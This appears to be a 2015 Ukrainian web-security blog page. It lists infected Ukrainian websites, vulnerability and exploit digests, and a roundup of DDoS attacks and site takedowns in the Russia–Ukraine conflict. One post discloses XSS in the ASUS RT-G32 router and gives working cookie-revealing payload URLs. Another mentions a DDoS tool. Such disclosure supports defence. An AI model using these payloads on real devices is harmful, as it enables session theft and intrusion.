23:55 24.03.2015
Після попереднього дослідження інфікованих сайтів, приведу нову інформацію про заражені сайти. З числа українських сайтів.
- http://pride.in.ua - інфекція була виявлена 19.03.2015. Зараз сайт входить до переліку підозрілих.
- http://infocombiz.com.ua - інфекція була виявлена 18.03.2015. Зараз сайт не входить до переліку підозрілих.
- http://pr-ukraine.kiev.ua - інфекція була виявлена 19.03.2015. Зараз сайт не входить до переліку підозрілих.
- http://serfak.pp.ua - інфекція була виявлена 31.01.2015. Зараз сайт не входить до переліку підозрілих.
- http://perekrestok.in.ua - інфекція була виявлена 05.03.2015. Зараз сайт не входить до переліку підозрілих.
- http://dzerkalo-zakarpattya.com - інфекція була виявлена 21.02.2015. Зараз сайт не входить до переліку підозрілих.
- http://tvbest.com.ua - інфекція була виявлена 30.01.2015. Зараз сайт не входить до переліку підозрілих.
- http://loads.com.ua - інфекція була виявлена 24.03.2015. Зараз сайт не входить до переліку підозрілих.
- http://market.ucoz.ua - інфекція була виявлена 24.02.2015. Зараз сайт не входить до переліку підозрілих.
- http://law-office.com.ua - інфекція була виявлена 06.03.2015. Зараз сайт не входить до переліку підозрілих.
Опубліковано в Новини сайту, Дослідження | Без Коментарів »
20:06 24.03.2015
В даній добірці уразливості в веб додатках:
- HP Data Protector, Remote Increase of Privilege, Denial of Service (DoS), Execution of Arbitrary Code (деталі)
- python-django security update (деталі)
- python-bottle security update (деталі)
- Directory Traversal in DevExpress ASP.NET File Manager (деталі)
- HP Autonomy Ultraseek, Cross-Site Scripting (XSS) (деталі)
Опубліковано в Уразливості | Без Коментарів »
17:20 24.03.2015
У лютому, 25.02.2015, я дав інтерв’ю виданню Dennik N. І 02.03.2015 воно було оприлюднене на сайті.
В інтерв’ю розповідається про мою діяльність і про кібер війну Росії проти України. Та про мою громадську ініціативу Українські Кібер Війська, що я створив 09.06.2014.
Ukrajinec zanechal pracu a vedie sukromnu kybervojnu proti Rusku
Так що кому буде цікаво прочитати інформацію про мене і УКВ, як тим хто вже читав мої попередні інтерв’ю в The Daily Beast та інших журналах чи дивився прямий ефір на Радіо Свобода, так і всім іншим, можете прочитати це інтерв’ю.
Опубліковано в Статті | Без Коментарів »
23:58 28.02.2015
У січні, 28.01.2015, я виявив Cross-Site Scripting та Cross-Site Request Forgery уразливості в ASUS Wireless Router RT-G32. Це перша частина дірок в RT-G32.
Раніше я писав про уразливості в Asus O!Play.
Cross-Site Scripting (WASC-08):
http://site/start_apply.htm?next_page=%27%2balert(document.cookie)%2b%27
http://site/start_apply.htm?group_id=%27%2balert(document.cookie)%2b%27
http://site/start_apply.htm?action_script=%27%2balert%28document.cookie%29%2b%27
http://site/start_apply.htm?flag=%27%2balert%28document.cookie%29%2b%27
Дані уразливості працюють як через GET, так і через POST.
ASUS RT-G32 XSS-1.html
Cross-Site Request Forgery (WASC-09):
Зміна паролю пристрою:
ASUS RT-G32 CSRF-1.html
Уразливі всі версії ASUS RT-G32. Перевірялося в ASUS RT-G32 з прошивками версій 2.0.2.6 і 2.0.3.2.
Опубліковано в Уразливості | Без Коментарів »
22:46 28.02.2015
Інформую вас про останні оновлення на сайті, що були зроблені в лютому.
Торік я випустив нові версії своїх секюріті програм DAVOSET (інструмент для використання AoF та XXE уразливостей на одних сайтах для проведення DoS і DDoS атак на інші сайти) та Backdoored Web Application (еталонний тест сканерів бекдорів). А цього року я зайнявся оновленням тестів.
Сьогодні я оновив перше тестування, в якому ви можете перевірити рівень своїх знань в галузі веб безпеки. В новій версії додав 5 нових запитань. А в другому тестуванні можете перевірити рівень своїх хакерських знань.
Опубліковано в Новини сайту | Без Коментарів »
20:08 28.02.2015
Раніше я писав про січневі DDoS атаки та взломи в Україні, а зараз розповім про ситуацію у лютому.
В зв’язку з сепаратистськими і терористичними акціями на сході України хакерська активність була значною. Відбулися наступні DDoS атаки та взломи в Інтернеті.
Російськими хакерами були атаковані наступні сайти:
vv.gov.ua (російськими хакерами) - 15.02.2015
Twitter акаунт Stopterrorua (російськими хакерами) - 15.02.2015
www.oblrada.lviv.ua (російськими хакерами) - 17.02.2015
Іноземними хакерами були проведені неполітичні взломи:
autobaza.pz.gov.ua (хакером Cyb3r_Sw0rd) - 24.02.2015
www.dzhankoi-rada.gov.ua (хакером Nofawkx Al) - 26.02.2015
Проукраїнськими хакерами були атаковані наступні сайти:
cont.ws (Українські Кібер Війська) - 16.02.2015
Лютневі DDoS атаки на сайти ДНР і ЛНР
Сайти ДНР і ЛНР були атаковані неодноразово на протязі лютого.
Українські Кібер Війська закрили наступні сайти:
Закритий сайт iskhod.org (через скаргу хостеру) - 02.2015
Закритий сайт slavpolk.ru (через скаргу хостеру) - 02.2015
Закритий сайт novorossia-onlain.info (через скаргу хостеру) - 02.2015
Закритий сайт russiancrimea.org (через скаргу хостеру) - 02.2015
Закритий сайт antimaidan.org (через скаргу хостеру) - 02.2015
Закритий сайт dobrovolec.org (через скаргу хостеру) - 02.2015
Закритий сайт tsarov.com.ua (через скаргу хостеру) - 02.2015
Закритий сайт pro-sto.org (через скаргу хостеру) - 02.2015
Закритий сайт rusvesna.org (через скаргу хостеру) - 02.2015
Закритий сайт slav.org.ua (через скаргу хостеру) - 02.2015
Опубліковано в Дослідження | Без Коментарів »
17:22 28.02.2015
У лютому місяці Microsoft випустила 9 патчів. Що більше ніж у січні.
У лютневому “вівторку патчів” Microsoft випустила черговий пакет оновлень, до якого увійшло 9 бюлетенів по безпеці. Що закривають 56 уразливостей в програмних продуктах компанії. Три патчі закривають критичні уразливості та шість патчів закривають важливі уразливості.
Дані патчі стосуються всіх поточних операційних систем компанії Microsoft - Windows 2003, Vista, 2008, 7, 2008 R2, 8, 2012, RT, 8.1 та RT 8.1. А також Microsoft Office, Internet Explorer, Office Web Apps і SharePoint Server.
Опубліковано в Новини | Без Коментарів »
22:45 27.02.2015
У лютому, 18.02.2015, вийшла нова версія WordPress 4.1.1.
WordPress 4.1.1 це багфікс випуск нової 4.1 серії. В якому розробники виправили 21 баг.
Офіційно жодних уразливостей не виправлено, лише баги. Але треба враховувати, що розробники WP полюбляють виправляти дірки приховано. Лише в 2013 році я виявив десятки приховано виправлених уразливостей в WP, про що я писав раніше.
Опубліковано в Новини сайту, Програми | Без Коментарів »
19:36 27.02.2015
Виявлені численні уразливості безпеки в Microsoft Office, а також в серверних продуктах Office Web Apps і SharePoint Server.
Уразливі продукти: Microsoft Office Web Apps 2010, Word Automation Services in SharePoint Server 2010.
Виконання коду, використання пам’яті після звільнення.
- Microsoft Security Bulletin MS15-012 - Important Vulnerabilities in Microsoft Office Could Allow Remote Code Execution (3032328) (деталі)
- Microsoft Security Bulletin MS15-013 - Important Vulnerability in Microsoft Office Could Allow Security Feature Bypass (3033857) (деталі)
Опубліковано в Новини, Помилки | Без Коментарів »
17:20 27.02.2015
В даній добірці експлоіти в веб додатках:
- FancyFon FAMOC 3.16.5 Cross Site Scripting / SQL Injection Vulnerabilities (деталі)
- ManageEngine Firewall Analyzer 8.0 - Directory Traversal/XSS Vulnerabilities (деталі)
- HP Data Protector EXEC_INTEGUTIL Remote Code Execution Exploit (деталі)
- Joomla Akeeba Kickstart Unserialize Remote Code Execution Exploit (деталі)
- Numara / BMC Track-It! FileStorageService Arbitrary File Upload Exploit (деталі)
Опубліковано в Експлоіти | Без Коментарів »